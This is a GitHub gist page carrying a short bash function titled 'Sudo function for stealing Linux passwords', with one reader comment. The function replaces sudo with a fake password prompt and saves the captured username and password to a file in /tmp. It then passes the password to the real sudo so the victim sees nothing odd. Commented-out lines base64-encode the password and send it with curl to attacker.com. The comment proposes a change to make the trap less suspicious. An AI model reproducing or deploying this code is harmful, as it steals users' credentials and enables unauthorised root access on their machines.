-
-
Save tokyoneon/34ce1c9e1530a12eb392b1eab09fcbac to your computer and use it in GitHub Desktop.
Sudo function for stealing Linux passwords
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function sudo () | |
{ | |
# https://null-byte.com/privesc-0194190/ | |
realsudo="$(which sudo)"; | |
read -s -p "[sudo] password for $USER: " inputPasswd; | |
printf "\n"; | |
printf '%s\n' "$USER : $inputPasswd" > /tmp/hackedPasswd.txt; | |
# encoded=$(printf '%s' "$inputPasswd" | base64) > /dev/null 2>&1; | |
# curl -s "http://attacker.com/$USER:$encoded" > /dev/null 2>&1; | |
$realsudo -S -u root bash -c "exit" <<< "$inputPasswd" > /dev/null 2>&1; | |
$realsudo "${@:1}" | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Nice! There's one small change I think is worthwhile though:
This way it skips the password prompt for subsequent commands, and doesn't look suspicious to a target running back to back sudo commands when they're still within the "root/sudo timeout" window.